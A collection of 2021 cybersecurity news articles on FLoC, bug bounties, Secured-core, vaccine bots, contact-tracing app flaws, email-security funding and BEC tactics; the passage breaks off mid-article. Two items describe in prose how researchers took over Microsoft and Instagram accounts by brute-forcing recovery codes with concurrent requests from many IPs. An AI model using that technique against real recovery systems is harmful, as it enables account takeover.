Google is set to test FLoC-based cohorts publicly later this month, starting with Chrome 89, before extending the trials with advertisers in Google Ads in the second quarter.

Concerns About Control, Privacy, and Trust
While these privacy-preserving plans mean less personal data is sent to third-parties, questions are being raised about how users will be grouped together and what guardrails are being put in place to avoid unlawful discrimination against certain groups based on sensitive attributes such as ethnicity, religion, gender, or sexual orientation.

Outlining that the change in underlying infrastructure involves sharing new information with advertisers, the Electronic Frontier Foundation (EFF) equated FLoC to a "behavioral credit score," calling it a "terrible idea" that creates new privacy risks, including the likelihood of websites to uniquely fingerprint FLoC users and access more personal information than required to serve relevant ads.

"If you visit a site for medical information, you might trust it with information about your health, but there's no reason it needs to know what your politics are," EFF's Bennett Cyphers said. "Likewise, if you visit a retail website, it shouldn't need to know whether you've recently read up on treatment for depression. FLoC erodes this separation of contexts, and instead presents the same behavioral summary to everyone you interact with."

Also of note is the scope and potential implications of Privacy Sandbox.

With Chrome's widespread market share of over 60% across desktop and mobile devices, Google's attempts to replace the cookie have been met with skepticism and pushbacks, not to mention attracting regulatory scrutiny earlier this year over worries that "the proposals could cause advertising spend to become even more concentrated on Google's ecosystem at the expense of its competitors."

The initiative has also been called out for being under Google's control and fears that it may only serve to tighten the company's grip on the advertising industry and the web as a whole, which critics say will "force more marketers into their walled garden and will spell the end of the independent and Open Web."

In response, Google noted it has taken into account the feedback about browser-centric control by incorporating what it calls a "trusted server" in FLEDGE to store information about an ad campaign's bids and budgets.

All said and done, third-party cookies aren't the only means to deliver ads on the web. Companies that collect first-party data, counting Facebook and Google, can still be able to serve personalized ads, as can ad tech firms that are embracing a DNS technique called CNAME cloaking to pass off third-party tracking code as coming from a first-party.

"Keeping the internet open and accessible for everyone requires all of us to do more to protect privacy — and that means an end to not only third-party cookies, but also any technology used for tracking individual people as they browse the web," Google said, adding it remains "committed to preserving a vibrant and open ecosystem where people can access a broad range of ad-supported content with confidence that their privacy and choices are respected."


Microsoft Pays $50,000 Bounty for Account Takeover Vulnerability
4.3.2021
Security  Securityweek

A security researcher says Microsoft has awarded him a $50,000 bounty reward for reporting a vulnerability that could have potentially allowed for the takeover of any Microsoft account.

The issue, India-based independent security researcher Laxman Muthiyah reveals, could have been abused to reset the password of any account on Microsoft’s online services, but wasn’t that easy to exploit.

The attack, the researcher explains, targets the password recovery process that Microsoft has in place, which typically requires the user to enter their email or phone number to receive a security code, and then enter that code.

Typically, a 7-digit security code is received, meaning that the user is provided with one of 10 million possible codes.

An attacker who wants to gain access to the targeted user’s account would need to correctly guess the code or be able to try as many of these codes as possible, until they enter the correct one.

Microsoft has a series of mechanisms in place to prevent attacks, including limiting the number of attempts to prevent automated brute forcing and blacklisting an IP address if multiple consecutive attempts are made from it.

What Muthiyah discovered, however, was not only a technique to automate the sending of requests, but also the fact that the system would no longer block the requests if they reached the server simultaneously (even the slightest delay would trigger the defense mechanism).

“I sent around 1000 seven digit codes including the right one and was able to get the next step to change the password,” the researcher says.

The attack is valid for accounts without two-factor authentication (2FA) enabled, but even the second authentication step could be bypassed, using the same type of attack, Muthiyah says. Specifically, the user is first prompted to provide a 6-digit code that their authenticator app has generated, and then the 7-digit code received via email or phone.

“Putting all together, an attacker has to send all the possibilities of 6 and 7 digit security codes that would be around 11 million request attempts and it has to be sent concurrently to change the password of any Microsoft account (including those with 2FA enabled),” the researcher says.

The issue was reported to Microsoft last year and a patch was rolled out in November. Microsoft awarded the researcher a $50,000 bug bounty reward as part of its Identity Bounty Program, assessing the vulnerability with a severity rating of important and considering it an “Elevation of Privilege (Involving Multi-factor Authentication Bypass)” -- this type of issue has the highest security impact in Microsoft’s Identity Bounty Program.

The only reason the vulnerability was not rated critical severity, the researcher notes, was the complexity of the attack. To process and send large numbers of concurrent requests, an attacker would need a good deal of computing power, along with the ability to spoof thousands of IP addresses.


Google Vows to Stop Tracking Individual Browsing for Ads
4.3.2021
Security  Securityweek

Google on Wednesday pledged to steer clear of tracking individual online activity when it begins implementing a new system for targeting ads without the use of so-called "cookies."

The internet giant's widely used Chrome browser this month will begin testing an alternative to the tracking practice that it believes could improve online privacy while still enabling advertisers to serve up relevant messages.

"We're making explicit that once third-party cookies are phased out, we will not build alternate identifiers to track individuals as they browse across the web, nor will we use them in our products," ads privacy and trust product management director David Temkin said in a blog post.

"Advances in aggregation, anonymization, and on-device process and other privacy-preserving technologies offer a clear path to replacing individual identifiers."

The move comes with Google hammered by critics over user privacy, and increased scrutiny of privacy and protecting people's data rights.

Growing fear of cookie-tracking has prompted support for internet rights legislation such as GDPR in Europe.

Temkin described the new Google system as "privacy-preserving... while still delivering results for advertisers and publishers."

Safari and Firefox browsers have already done away with third-party cookies, but they are still used at the world's most popular browser, Chrome.

Chrome accounted for 63 percent of the global browser market last year, according to StatCounter.

Last month, Google unveiled the results of tests showing an alternative to cookies called Federated Learning of Cohorts (FLoC) which identifies groups of people with common interests without individualized tracking.

Some businesses have objected to the Google plan claiming it will force more advertisers into its "walled garden."


Microsoft Expands Secured-core to Servers, IoT Devices
4.3.2021
Security  Securityweek

Microsoft this week announced Secured-core Server and Edge Secured-core, two solutions aimed at improving the security of servers and connected devices.

Initially announced in 2019, Secured-core is the result of a partnership between Microsoft and hardware manufacturers, and its goal is to add a security layer that combines identity, virtualization, operating system, hardware and firmware protection capabilities.

When it introduced Secured-core PCs, Microsoft said they were ideal for industries handling highly sensitive information, such as financial services, government, and healthcare. The company is now expanding coverage to servers and Internet of Things (IoT) devices, aiming to protect them against common attack vectors.

“Secured-core functionality helps proactively close the door on the many paths that attackers may try to exploit, and it allows IT and SecOps teams to optimize their time across other priorities,” the tech company says.

Secured-core Server aims to deliver not only advanced protection, but also simplified security and preventative defense. Thus, both hardware and firmware that manufacturers bring to market should satisfy specific security requirements.

Secured-core certified systems that feature secure hardware platforms are available for both Windows Server and validated Azure Stack HCI solutions, the company says.

The expanded coverage is accompanied by new functionality in the Windows Admin Center, allowing customers to configure the OS security features of Secured-core for Windows Server and Azure Stack HCI systems directly from a web browser. Manufacturers have the option to enable OS features for Azure Stack HCI systems.

Secured-core Servers feature hardware root-of-trust (courtesy of capabilities such as BitLocker, which leverages Trusted Platform Module 2.0), firmware protection (with support for Dynamic Root of Trust of Measurement (DRTM) technology), and support for virtualization-based security (VBS) and hypervisor-based code integrity (HVCI) to isolate parts of the OS and protect against entire classes of vulnerabilities.

Edge Secured-core, on the other hand, seeks to improve the built-in security of IoT devices running a full OS and also brings Secured-core to Linux.

Microsoft is also making Edge Secured-core public preview available within the Azure Certified Device program. Certified devices meet additional security requirements related to device identity, data protection, device updates, secure boot, OS hardening, and vulnerability disclosures.

Edge Secured-core devices feature a zero-trust attestation model, a built-in security agent, and security by default, to enforce system integrity, deliver hardware-based device identity, be remotely manageable, stay updated, and deliver protection for data.


A $50,000 Bug Could've Allowed Hackers Access Any Microsoft Account
4.3.2021
Security  Thehackernews

Microsoft has awarded an independent security researcher $50,000 as part of its bug bounty program for reporting a flaw that could have allowed a malicious actor to hijack users' accounts without their knowledge.

Reported by Laxman Muthiyah, the vulnerability aims to brute-force the seven-digit security code that's sent to a user's email address or mobile number to corroborate his (or her) identity before resetting the password in order to recover access to the account.

Put differently, the account takeover scenario is a consequence of privilege escalation stemming from an authentication bypass at an endpoint which is used to verify the codes sent as part of the account recovery process.

The company addressed the issue in November 2020, before details of the flaw came to light on Tuesday.

Although there are encryption barriers and rate-limiting checks designed to prevent an attacker from repeatedly submitting all the 10 million combinations of the codes in an automated fashion, Muthiyah said he eventually cracked the encryption function used to cloak the security code and send multiple concurrent requests.

Indeed, Muthiyah's tests showed that out of 1000 codes that were sent, only 122 of them got through, with the others blocked with the error code 1211.

"I realized that they are blacklisting the IP address [even] if all the requests we send don't hit the server at the same time," the researcher said in a write-up, adding that "a few milliseconds delay between the requests allowed the server to detect the attack and block it."

Following this discovery, Muthiyah said he was able to get around the rate-limiting constraint and reach the next step of changing the password, thereby allowing him to hijack the account.

While this attack only works in cases where the account is not secured by two-factor authentication, it can still be extended to defeat the two layers of protection and modify a target account's password — something that could be prohibitive given the amount of computing resources required to mount an attack of this kind.

"Putting all together, an attacker has to send all the possibilities of 6 and 7 digit security codes that would be around 11 million request attempts and it has to be sent concurrently to change the password of any Microsoft account (including those with 2FA enabled)," Muthiyah said.

Separately, Muthiyah also employed a similar technique to Instagram's account recovery flow by sending 200,000 concurrent requests from 1,000 different machines, finding that it was possible to achieve account takeover. He was rewarded $30,000 as part of the company's bug bounty program.

"In a real attack scenario, the attacker needs 5000 IP addresses to hack an account," Muthiyah noted. "It sounds big but that's actually easy if you use a cloud service provider like Amazon or Google. It would cost around 150 dollars to perform the complete attack of one million codes."


Meet the Vaccine Appointment Bots, and Their Foes
27.2.2021  Security  Securityweek

Having trouble scoring a COVID-19 vaccine appointment? You’re not alone. To cope, some people are turning to bots that scan overwhelmed websites and send alerts on social media when slots open up.

They’ve provided relief to families helping older relatives find scarce appointments. But not all public health officials think they’re a good idea.

In rural Buckland, Massachusetts, two hours west of Boston, a vaccine clinic canceled a day of appointments after learning that out-of-towners scooped up almost all of them in minutes thanks to a Twitter alert. In parts of New Jersey, health officials added steps to block bots, which they say favor the tech-savvy.

What is a Vaccine Bot?

Bots — basically autonomous programs on the web — have emerged amid widespread frustration with the online world of vaccine appointments.

Though the situations vary by state, people often have to check multiple provider sites for available appointments. Weeks after the rollout began, demand for vaccines continues to outweigh supply, complicating the search even for eligible people as they refresh appointment sites to score a slot. When a coveted opening does appear, many find it can vanish midway through the booking.

The most notable bots scan vaccine provider websites to detect changes, which could mean a clinic is adding new appointments. The bots are often overseen by humans, who then post alerts of the openings using Twitter or text notifications.

A second type that’s more worrisome to health officials are “scalper” bots that could automatically book appointments, potentially to offer them up for sale. So far, there’s little evidence scalper bots are taking appointments.

Are Vaccine Bot Alerts Helping?

Yes, for the people who use them.

“THANK YOU! THANK YOU! THANK YOU! I GOT MY DAD AN APPOINTMENT! THANK YOU SO MUCH!” tweeted Benjamin Shover, of Stratford, New Jersey, after securing a March 3 appointment for his 70-year-old father with the help of an alert from Twitter account @nj_vaccine.

The success came a month after signing up for New Jersey’s state online vaccine registry.

“He’s not really tech-savvy,” Shover said of his father in an interview. “He’s also physically disabled, and has arthritis, so it’s tough for him to find an appointment online.”

The creator of the bot, software engineer Kenneth Hsu, said his original motivation was to help get an appointment for his own parents-in-law. Now he and other volunteers have set a broader mission of assisting others locked out of New Jersey’s confusing online appointment system.

“These are people who just want to know they’re on a list somewhere and they are going to be helped,” Hsu said. “We want everyone vaccinated. We want to see our grandparents.”

What do Health Officials Think?

The bots have met resistance in some communities. A bot that alerted Massachusetts residents to a clinic this week in sparsely populated Franklin County led many people from the Boston area to sign up for the slots. Local officials canceled all of the appointments, switched to a private system and spread the word through senior centers and town officials.

“Our goal was to help our residents get their vaccination,” said Tracy Rogers, emergency preparedness manager for the Franklin Regional Council of Governments. “But 95% of the appointments we had were from outside Franklin County.”

New Jersey’s Union County put a CAPTCHA prompt in its scheduling system to confirm visitors are human, blocking efforts “to game” it with a bot, said Sebastian D’Elia, a county spokesperson.

“When you post on Twitter, only a certain segment of society is going to see that,” he said. Even if they’re trying to help someone else, D’Elia said others do not have the luxury of people who are advocating for them.

But the person who created a bot that’s now blocked in Union County, 24-year-old computer programmer Noah Marcus, said the current system isn’t fair, either.

“The system was already favoring the tech-savvy and the person who can just sit in front of their computer all day, hitting refresh,” Marcus said.

D’Elia said the county is also scheduling appointments by phone to help those who might have trouble online.

How do They Work?

Marcus used the Python coding language to create a program that sifts through a vaccine clinic website, looking for certain keywords and tables that would indicate new appointments. Other bots use different techniques, depending on how the target website is built.

This kind of information gathering, known as web scraping, remains a source of rancor. Essentially, scraping is collecting information from a website that its owner doesn’t want collected, said Orin Kerr, a law professor at the University of California, Berkeley.

Some web services have taken web scrapers to court, saying scraping techniques violate the terms and conditions for accessing their sites. One case involving bots that scraped LinkedIn profiles is before the U.S. Supreme Court.

“There’s disagreement in the courts about the legality of web-scraping,” Kerr said. “It’s a murky area. It’s probably legal but it’s not something we have certainty about.”

The website for a mass vaccination site in Atlantic City, New Jersey says its online queue system — which keeps people waiting on the site as slots are allotted — is designed to prevent it from crashing and to stop bots from snapping up appointments “from real people.” But is that actually happening?

Making a bot that can actually book appointments -- not just detect them -- would be a lot harder. And sites usually ask for information such as a person’s date of birth to make sure they are eligible.

Pharmacy giants Walgreens and CVS, which are increasingly giving people shots across the U.S., have already said they’ve been working to prevent such activity.

Walgreens said it is using cybersecurity techniques to detect and prevent bots so that “only authorized and eligible patients will have access to schedule a vaccine appointment.” CVS Health said it’s encountered various types of automated activities and has designed its appointment-making system to validate legitimate users.


Security, Privacy Issues Found in Tens of COVID-19 Contact Tracing Apps
27.2.2021 
Security  Securityweek

An analysis of 40 COVID-19 contact tracing applications for Android has led to the discovery of numerous security and privacy issues, according to a new research paper.

Contact tracing applications have been created to help authorities automate the process of identifying those who have been in close contact with infected individuals.

Using a newly developed tool called COVIDGuardian, which was designed for both static and dynamic program analysis, academic researchers with universities in Australia and the United Kingdom analyzed 40 worldwide Android contact tracing apps and discovered potential security risks in more than half of them.

COVIDGuardian, an automated security and privacy assessment tool, was used to assess the security performance of the analyzed applications against four categories, namely manifest weaknesses, general security vulnerabilities, data leaks (with a focus on personally identifiable information), and malware detection.

Identified issues, the researchers say, include the use of insecure cryptographic algorithms (72.5%), the storing of sensitive information in clear text (55%), insecure random values (55%), permissions to perform backups (roughly 42.5% of apps), and the inclusion of trackers (20 trackers were identified in approximately 75% of the apps).

The research has revealed that the security of these apps is only slightly influenced by the use of a decentralized architecture, but also the fact that users are more likely to install a contact tracing app that has stronger privacy settings.

After being contacted by the researchers, some of the application developers addressed identified issues, including the leak of information and the inclusion of trackers. Other apps, however, were found to include even more vulnerabilities and trackers after they were updated.

The researchers also conducted a survey of more than 370 people regarding the use of contact tracing apps, their concerns, and their preference on centralized or decentralized apps.

“Security and privacy concerns have been a big issue affecting the uptake of these apps,” said Dr Gareth Tyson, senior lecturer at Queen Mary University of London and one of the authors of the study. “We were surprised that the debate around decentralised vs centralised apps didn’t seem so important and, instead, users were more focused on the exact details of what private information is collected. This should encourage developers to offer stronger privacy guarantees for their apps.”


The Race to Find Profits in Securing Email

26.2.2021 Security  Securityweek

NEWS ANALYSIS -- More than 17 years after Bill Gates’s famous declaration that the spam problem was close to being solved for good, the corporate inbox continues to be a lucrative target for malicious hackers. Now, a wave of well-funded email security startups are emerging to take another stab at securing the entry point for almost all major cyber attacks.

Email security specialists Armorblox on Thursday announced a new $30 million venture capital funding round, joining a growing list of well-heeled startups taking a stab addressing one of cybersecurity’s most difficult problems: keeping malicious hackers out of corporate mailboxes.

Armorblox, based in Sunnyvale, Calif., has now banked a total of $46.5 million to position itself nicely to continue to shave away at market share from incumbents like Proofpoint, Mimecast and Forcepoint.

The company says it will use the new funding to build out its engineering and data science teams and double down on its bet that the magic of machine learning can effectively address the kinds of targeted email attacks that hit businesses of all sizes.

Armorblox sells a platform that connects over APIs and analyzes thousands of signals to understand the context of email communications. Security teams can use the data from the platform to block targeted phishing attacks, protect sensitive PII and PCI, and automate remediation of user-reported email threats.

While the overuse of “ML/AI” buzzwords can ruin any attempt at properly discussing ML/AI capabilities, Armorblox CEO DJ Sampath is bullish on leveraging natural language understanding, deep learning, traditional machine learning, and detection techniques to organize signals across identity, behavior and language. “If legacy email protection controls are padlocks, think of Armorblox as a fingerprint scanner,” he said.

Sampath believes this approach also helps with the tricky problem of remediation where defenders walk the tightrope between safety and employee productivity.

He is betting that “context-aware threat detection” will be much more reliable and efficient than today’s collection of threat deeds, metadata and one-shot detection tools built into incumbent email security offerings.

With cybersecurity-related spending hitting astronomical numbers and massive security data lakes now providing revenues for tech companies, Armorblox has bigger ambitions in a data-centric, post-pandemic, work-from-home world.

Sampath isn’t shy about his company’s aspirations to find treasure in use-cases beyond cybersecurity: “We believe that the ability to create a single system that can combine a universal understanding of all content and a proper catalog of contextualized interactions with the data can serve a variety of purposes far beyond just detecting cases of intellectual property misuse over email or business email compromise scenarios.”

Armorblox isn’t alone with heady big-data ambitions but it will be a long slog against dozens of well-funded startups, entrenched incumbents and headwinds from the cloud email providers themselves -- Microsoft (Office 365/Teams), Google (GSuite/VirusTotal/GCloud).

Microsoft and Google provide the developer APIs that allow “inside-out” security technologies to bake detection and other logic into email traffic flows but, as is clear lately, the bigger tech vendors have their own cybersecurity business ambitions.

Another early-stage email security play worth watching is Material Security, a company that came out of stealth last June with $22 million in funding from Andreessen Horowitz and a roster of CISOs publicly backing its inline approach to integrate two-factor authentication to attachment recovery.

Material Security, the brainchild of ex-Dropbox engineers Ryan Noon, Abhishek Agrawal and Chris Park, offers security teams the ability to redact sensitive content in email -- even older archived mail -- and make them available only after a two-factor verification step. This lets the company market in the leak prevention, ATO (account takeover), phishing herd immunity and other visibility and admin controls.

Separately, a wide range of companies have received funding to play in the multi-billion dollar email security pond. These include Agari ($85 million raised), Valimail ($84 million raised), Area 1 ($82 million raised), Abnormal ($74 million), Avanan ($41 million), Inky ($32 million), and GreatHorn ($22 million).

Industry watchers expect the email security market to reach $6 billion by 2024, driven mostly by the rapid COVID-related digital transformation.


Robinhood Taps Caleb Sima to Lead Security
23.2.2021
Security  Securityweek

Caleb Sima to Join Robinhood as Chief Security Officer

Veteran cybersecurity practitioner, entrepreneur and executive Caleb Sima has been tapped to lead security at mobile stock trading startup Robinhood.

Sima, a security leader with an established presence in cybersecurity for more than two decades, announced the move on LinkedIn. He will be joining investing firm Robinhood as Chief Security Officer (CSO).

Sima was most recently VP of Security at Databricks and, before that, he managed security engineering, architecture, red team and vulnerability management at Capital One.

In the early 2000s, Sima co-founded application security startup SPI Dynamics and sold it to HP. He also co-founded Bluebox Security, a mobile security play that was acquired by Lookout in 2016.

Sima joins the embattled financial services firm RobinHood at a sensitive time, with the company facing massive mainstream media attention. The Menlo Park., Calif-based company claims that about 13 million users trade stock and ETFs on its mobile app.

The news of Sima’s hiring comes on the same day Reddit announced it had snagged Bank of America security executive Allison Miller to be its Chief Information Security Officer (CISO).

In other CISO-related people news, Cisco has promoted Anthony Grieco to the CISO slot following the departure of Mike Hanley.

Akamai’s Andy Ellis is also leaving the CSO role there after a 20-year career.


Palo Alto Networks Buys Bridgecrew in ‘Shift Left’ Cloud Security Push
17.2.2021
Security  Securityweek

Palo Alto Networks on Tuesday snapped up early-stage startup Bridgecrew, adding a cloud security platform for developers to its $3.4 billion-a-year enterprise product portfolio.

The two sides said the deal is valued at $156 million in cash and is expected to close in the third quarter this year.

For Palo Alto, the deal is part of a strategy to spend big to snap up early-stage companies in the cloud security and DevOps workflow space. The Bridgecrew deal follows a $420 million purchase of CloudGenix last March and a separate $173 million deal to buy Redlock, both cloud security specialist plays.

For Bridgecrew, an Israel-based venture-backed startup that’s barely two years old, the exit is significant. Bridgecrew raised a total of $18 million over two funding rounds with public reports pegging its valuation last year at around $40 million.

The company was founded by serial entrepreneur Idan Tendler with venture capital backing from Battery Ventures, NFX, Tectonic Ventures, DNX Ventures, Sorensen Ventures, and Homeward Ventures.

Bridgecrew styles itself as a pioneer in Shift Left, the popular practice aimed at finding and preventing defects early in the software delivery process. The idea is to improve quality by moving tasks to the left as early in the software lifecycle as possible, meaning that important security testing is done earlier in the software development process.

Bridgecrew’s security platform, which includes the Checkov open-source scanner, offers developers and DevOps teams a systematic way to enforce infrastructure security standards throughout the development lifecycle.

"Shift left security is a must-have in any cloud security platform. Developers don't want to wait until runtime to find out their security is not working, and the CISO charged with protecting the entire organization certainly values higher security from fixing issues earlier in the development lifecycle,” said Palo Alto chief executive Nikesh Arora.

Palo Also plans to fit Bridgecrew’s technology into its own Prisma Cloud to provide developers with security assessment and enforcement capabilities throughout the DevOps process.

Prisma Cloud is Palo Alto's security platform that sells into the enterprise cloud security posture management (CSPM) and cloud workload protection platform (CWPP) categories.

Palo Alto said it would continue to invest in Bridgecrew's open-source initiatives.


How kids coped with COVID-hit winter holidays
6.2.2021 
Security  Securelist
Due to the pandemic situation in late 2020, street festivities got canceled worldwide. For many families, get-togethers with grandparents over the Christmas period were also put on hold. As a result, children across the globe sought holiday fun and games from the comfort of home. And thanks to modern tech and the ubiquitous internet, they had no reason to be bored.

We analyzed and categorized the most popular websites and search queries over the festive period (December 20, 2020 — January 10, 2021) to find out how kids compensated for the lack of outdoor winter entertainment.

How we collect our statistics
Our Kaspersky Safe Kids solution for home users scans the contents of web pages that children try to visit. If the site falls into one of fourteen undesirable categories, the product sends an alert to Kaspersky Security Network. In doing so, no personal data is transmitted and user privacy is not violated. Note:

It is up to the parent to decide which content to block by tweaking the protective solution’s preferences. However, anonymous statistics are collected for all the 14 categories.
The information in this report was obtained from computers running Windows and macOS; mobile statistics are not presented.
Website categorization
Web filtering in Kaspersky Safe Kids currently covers the following categories:

Online communication (social networks, messengers, chats, forums)
Adult content
Alcohol, tobacco, narcotics
Violence
Weapons, explosives, pyrotechnics
Profanity
Gambling, lotteries, sweepstakes
Video games
Electronic commerce (shops, banks, payment systems)
Software, audio, video
Recruitment
Religions, religious associations
News media
Anonymous access tools
Search query filtering
Children’s search activities best illustrate their interests. Kaspersky Safe Kids can filter kids’ queries in five search engines (Bing, Google, Mail.ru, Yahoo!, Yandex), as well as on YouTube. Filtering targets six potentially dangerous topics: Adult content, Alcohol, Narcotics, Tobacco, Racism and Profanity.

We took as the 100% value the Top 1000 search queries collected from the above search engines, plus YouTube, and separately calculated the Top 1000 search queries for this video platform. The ranking was based on the number of times a query was input, without breakdown by region or language. The popularity of a topic is determined by its share of related queries.

We divided the search queries collected from December 20, 2020 to January 10, 2021 into thematic categories:

YouTube
Games
Translate
Communication
Music
Video platforms
Education
Shopping
Anime
Cartoons
Other topics
Because YouTube queries account for nearly 50% of the total, they merit a separate category.

What sites were kids interested in?

Distribution of categories of visited sites, December 20, 2020 — January 10, 2021 (download)

Most often, children visited websites with video and audio content (40.36%). This is 2.58 p.p. more than the average for the year (June 2019 — May 2020), while the share of the category amounted to 39.11%. In second place was Online communication (25.8%). The share of visits to the web versions of WhatsApp and Telegram, Facebook, Instagram and other sites in this category also increased against the average indicator for the year (24.16%). Third place went to Video games (16.19%), interest in which also grew slightly: data for the period June 2019 — May 2020 showed 15.98%. But the number of visits to online stores turned out lower than the yearly average: 10.94% versus 11.25% in 2019–2020.

What did kids look for during the winter break?

Distribution of Top 1000 search queries by topic, December 20, 2020 — January 10, 2021 (download)

Kids’ search activity shines a light on their interests and largely correlates with the stats on website hits. The highest number of searches in the Top 1000 during the winter break mentioned YouTube (20.84%). In second place in terms of popularity were gaming-related queries (15.47%). Kids also often searched for online translation resources (11.02%). The most popular English-language query on this topic was “google translate”.

Software, audio, video
Despite many overlapping interests, kids from one region sometimes showed a greater preference for certain content than their peers elsewhere. In particular, children from South Asia (Bangladesh, India) showed the most interest in audio and video content (52.84%). In the CIS, meanwhile, the share of such content was only 39.2%.

Share of visits to websites in the Software, audio, video category by region, December 20, 2020 — January 10, 2021 (download)

YouTube is currently one of the most popular sites; it was there that children spent most of their time during the festive holidays. This is backed up by the data on kids’ search queries: 46% of all Top 1000 queries in the reporting period happened on YouTube; and the most popular search engine query worldwide was “youtube”.

Distribution of Top 1000 search queries by source, December 20, 2020 — January 10, 2021 (download)

We decided to see what exactly kids look for inside YouTube itself. To do so, we collected the Top 1000 search queries by children on this platform from December 20, 2020 to January 10, 2021.

Distribution of Top 1000 kids’ search queries on YouTube by topic, December 20, 2020 — January 10, 2021 (download)

Most often, children searched for gaming content (37%). In second place are searches for bloggers or channels of a general nature (20.94%). The typical blogger followed by kids usually posts videos related to one or more of the following: challenges, unboxing, DIY, lifestyle, streams of popular games; plus a mandatory music clip. Such bloggers accounted for no less than a fifth of the search queries in our Top 1000.

The third most common YouTube search topic, as expected, is music (17.13%), the most sought-after artists being the Korean pop groups BLACKPINK and BTS, alongside Ariana Grande, Billie Eilish and Travis Scott. The most popular songs were “Baby Shark”, “Dance Monkey” and “Savage Love” (a dance on TikTok with 24 million views).

But YouTube wasn’t the only platform of interest to children. In the Video platforms category (7.59%), children searched for “netflix”, “disney plus”, “amazon prime” and (Russian-speaking kids) “yandex ether”.

The most popular TV series over the festive period, judging by the number of queries, was The Mandalorian.

Video games
The Video games category ranks third by number of website visits by children worldwide. The most likely to visit gaming sites were kids in Asia (25.10%). But those in South Asia, as we saw above, prefer video and audio content (5.21%) over games.

Share of visits to websites in the Video games category by region, December 20, 2020 — January 10, 2021 (download)

Among the search queries, gaming is the second most popular topic after queries related to YouTube. The three most popular queries in the reporting period were “roblox”, “among us” and “minecraft”.

Moreover, most kids’ searches on YouTube were for channels of streamers who play live games and bloggers who specialize in Minecraft.

Shares of grouped search queries in the Top 1000 queries on the topic of video games on YouTube, December 20, 2020 — January 10, 2021 (download)

The most popular gaming blogger among English speakers for many years now has been PewDiePie, and among Russian speakers Pozzi. The most popular kids’ games, judging by YouTube search activity, are Among Us, Minecraft, Brawl Stars and Gacha Life. The last of these let’s players create video stories to watch on YouTube, which kids simply love.

As we predicted in the runup to the festive period, kids couldn’t get enough of the Nintendo Switch game console. During the winter break, kids searched for “nintendo switch” and “nintendo switch lite” more often than “ps5”. One of the biggest-hit Nintendo Switch games was Just Dance.

Interests worth a special mention
In some regions winter break starts earlier or later than in others, that is why education (5.34%) was still a popular search topic. English-speaking children, for example, most often searched for “google classroom”.

During the holidays, children took an interest in DIY instruction videos. The most popular YouTube channels on this topic are 5-Minute Crafts (70 million+ subscribers), Troom Troom (21.7 million) and 123 GO! (around 10 million). Accordingly, the most popular DIY-themed searches among kids were “5 minute crafts”, “troom troom” and “123 go”.

5-Minute Crafts channel on YouTube

Besides musicians and bloggers, the personalities that children inquired about most during the winter break were Donald Trump (searched for more than any other famous figure), Emma Watson and Elon Musk.

Despite ASMR videos having been around forever (almost), we observed that kids have become more interested in them lately. Among the frequent searches were “asmr” and “asmr eating”.

This winter was not without challenges (in every sense of the word). As for the online variety, Try Not To Laugh was the most popular during the holiday period. Children searched for it not only in English, but also, for example, in German “versuche nicht zu lachen”.

If you think kids had no time for TikTok, think again. In addition to the general queries “tiktok” and “tik tok”, they searched for “tik tok mashup”, “how to change restricted mode on tiktok”.

Conclusion
Despite the absence of Christmas fairs and New Year parties, children still found plenty of entertainment, and not only of the consumerist kind. Going by the popularity of DIY videos, kids enjoy tinkering and making things manually, while their passion for Gatcha Life reveals a desire to tell and screen their own stories. TikTok inspires them to get off the couch and shoot all kinds of videos, not just silly ones. K-pop makes it impossible to sit still, and kids love learning dance moves from music clips and special dance videos. Contrary to the stereotype, video games can also help stay physically active: for example, on the Nintendo Switch, the smash-hit Just Dance, which teaches dance moves, and the fitness games Ring Fit Adventure and Fitness Boxing 2: Rhythm & Exercise, released in early December 2020.

Modern technologies are deeply integrated into all our lives, and especially for children who have no recollection of a world without video games, YouTube and messengers at their beck and call. And that’s no bad thing, because today’s kids know how to diversify their leisure time without leaving home. We adults would do well to take a leaf from their virtual book.


Google Paid Out $6.7 Million in Bug Bounty Rewards in 2020
6.2.2021 
Security  Securityweek

Google this week said it paid out more than $6.7 million in rewards as part of its bug bounty programs in 2020.

The total amount of bug bounty rewards increased only slightly compared to 2019, when the Internet search giant paid just over $6.5 million. Running for ten years, the company’s programs have resulted in approximately $28 million in reward payouts to date.

A total of 662 researchers from 62 countries received bug bounty payouts last year, with the highest reward being of $132,500.

Google has Vulnerability Reward Programs (VRPs) in place for multiple products, including the Chrome browser, the Android operating system, and the Google Play Store.

Last year, Google paid out $1.74 million in rewards as part of the Android VRP. A total of 13 working exploit submissions were received in 2020, resulting in $1 million in exploit reward payouts. The Internet giant announced higher exploit payouts in November 2019.

According to the company, 30% of the total number of Android exploits ever reported as part of the bug bounty programs were submitted by Guang Gong (@oldfresher) and the team of researchers at the 360 Alpha Lab at Chinese cybersecurity firm Qihoo 360.

The most recent of the 8 exploits they discovered is a 1-click remote root exploit in Android, Google says, adding that the team still holds the top Android payout ($161,337) for an exploit submitted in 2019.

At $400,000, the top all-time spot in Android exploit payouts is held by a researcher who recently submitted two new exploits.

In 2020, the Internet search company also paid $50,000 in rewards for flaws in Android 11 developer preview and launched bounty programs for Android Auto OS, Android chipsets, and for writing fuzzers for Android code.

Following an increase in rewards for Chrome vulnerabilities, Google paid out 83% more than in 2019 as part of the Chrome VRP, for a total of $2.1 million across 300 bugs.

The percentage of V8 bugs dropped from 14% in 2019 to only 6% in 2020, but the number is expected to increase, as Google is offering bonuses for clearly exploitable V8 flaws.

With an expanded criteria to include apps using the Exposure Notification API and ones engaging in contact tracing, the Google Play Security Rewards Program also saw an increase in the maximum bounty award for qualifying vulnerabilities, to $20,000.

Google paid more than $270,000 to the Android researchers who submitted reports as part of the Google Play Security Rewards Program and Developer Data Protection Reward Program in 2020.

In 2020, Google received twice as many reports through the Abuse program, compared to 2019, which resulted in more than 100 issues across roughly 60 different products being patched.

Last year, the Internet search giant also awarded more than $400,000 in grants to over 180 security researchers. The researchers submitted more than 200 reports and helped identify over 100 vulnerabilities.

Google also said it gave $280,000 to charity last year.


Microsoft 365 Becomes Haven for BEC Innovation
30.1.2021 
Security  Threatpost

Two new phishing tactics use the platform’s automated responses to evade email filters.

Two fresh business email compromise (BEC) tactics have emerged onto the phishing scene, involving the manipulation of Microsoft 365 automated email responses in order to evade email security filters.

In one case, scammers are targeting victims by redirecting legitimate out-of-office (OOO) replies from an employee to them; and in the other, read receipts are being manipulated. Both styles were seen being used in the wild in the U.S. in December, when auto-responders were more prevalent due to holiday vacation.

“These tactics indicate attackers are using every available tool and loophole to their advantage in the hopes of a successful BEC attempt,” said Roman Tobe, researcher with Abnormal Security, in a posting this week.

Return to Sender: Read Receipts
